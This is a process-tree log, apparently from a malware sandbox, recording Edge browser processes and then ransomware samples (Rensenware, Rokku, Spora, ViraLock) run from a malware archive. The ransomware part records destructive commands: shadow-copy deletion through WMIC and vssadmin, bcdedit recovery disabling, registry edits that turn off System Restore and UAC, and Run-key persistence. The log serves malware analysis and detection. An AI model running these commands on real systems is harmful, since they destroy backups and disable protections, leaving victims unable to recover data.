C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:12⤵PID:5084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:12⤵PID:3544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:12⤵PID:3332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:12⤵PID:3636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:12⤵PID:3076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:12⤵PID:1076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2476 /prefetch:82⤵PID:1108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:12⤵PID:2564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6680 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:2860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6744 /prefetch:12⤵PID:2820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:12⤵PID:1764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5072 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6484 /prefetch:12⤵PID:2160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4720 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:1484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:12⤵PID:3908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:12⤵PID:1928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6768 /prefetch:12⤵PID:3020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6980 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:2112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:12⤵PID:5220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6792 /prefetch:12⤵PID:5728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5764 /prefetch:82⤵PID:6848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=6784 /prefetch:82⤵PID:5244
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3972
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4976
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5080
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\Rensenware.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\Rensenware.exe"1⤵PID:4780
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 8602⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4520
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\Rokku.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\Rokku.exe"1⤵PID:1288
-
C:\Windows\SysWOW64\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\services\VSS" /v Start /t REG_DWORD /d 4 /f2⤵PID:3260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵PID:2884
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop vss2⤵PID:4716
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vss3⤵
- System Location Discovery: System Language Discovery
PID:4624
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop swprv2⤵
- System Location Discovery: System Language Discovery
PID:3912 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swprv3⤵PID:1824
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop srservice2⤵PID:2904
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop srservice3⤵
- System Location Discovery: System Language Discovery
PID:3888
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3140
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4896
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Downloads\README_HOW_TO_UNLOCK.HTML1⤵PID:4696
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff87e1c3cb8,0x7ff87e1c3cc8,0x7ff87e1c3cd82⤵PID:3636
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\SporaRansomware.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\SporaRansomware.exe"1⤵
- Drops startup file
- NTFS ADS
PID:3748 -
C:\Windows\SysWOW64\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"2⤵
- System Location Discovery: System Language Discovery
PID:5796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\USFFB-11ZTZ-TXTXH-TOTOY.HTML2⤵PID:3232
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff87e1c3cb8,0x7ff87e1c3cc8,0x7ff87e1c3cd83⤵PID:2788
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:1460 -
C:\Users\Admin\IisUcwYw\WecUgIMY.exe"C:\Users\Admin\IisUcwYw\WecUgIMY.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
PID:3116 -
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" about:blank3⤵PID:5440
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" about:blank4⤵
- Modifies Internet Explorer settings
PID:2860
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" about:blank3⤵
- System Location Discovery: System Language Discovery
PID:5140 -
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" about:blank4⤵
- Modifies Internet Explorer settings
PID:5548
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" about:blank3⤵PID:3156
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" about:blank4⤵
- Modifies Internet Explorer settings
PID:6156
-
-
-
-
C:\ProgramData\CwUwoUQU\JkckUkcM.exe"C:\ProgramData\CwUwoUQU\JkckUkcM.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"2⤵
- System Location Discovery: System Language Discovery
PID:3608 -
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:392 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"4⤵PID:4328
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2820 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"6⤵PID:3280
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1476 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"8⤵
- System Location Discovery: System Language Discovery
PID:1416 -
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"9⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1460 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"10⤵PID:1452
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2600 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"12⤵
- System Location Discovery: System Language Discovery
PID:3624 -
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"13⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1596 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"14⤵
- System Location Discovery: System Language Discovery
PID:1484 -
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"15⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4812 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"16⤵PID:4364
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"17⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2372 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"18⤵PID:1388
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"19⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3204 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"20⤵PID:416
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"21⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2112 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"22⤵
- System Location Discovery: System Language Discovery
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"23⤵
- Executes dropped EXE
PID:7124 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"24⤵PID:5648
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"25⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5684 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"26⤵PID:6456
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"27⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5728 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"28⤵
- System Location Discovery: System Language Discovery
PID:1388 -
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"29⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5456 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"30⤵
- System Location Discovery: System Language Discovery
PID:5584 -
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"31⤵
- Executes dropped EXE
PID:5564 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"32⤵PID:2916
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"33⤵
- Executes dropped EXE
PID:4652 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock"34⤵
- System Location Discovery: System Language Discovery
PID:6432
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 134⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:5136
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 234⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:6944
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f34⤵
- UAC bypass
- Modifies registry key
PID:6180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YGUscgsQ.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""34⤵PID:6556
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs35⤵PID:6416
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 132⤵
- Modifies visibility of file extensions in Explorer
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:6708
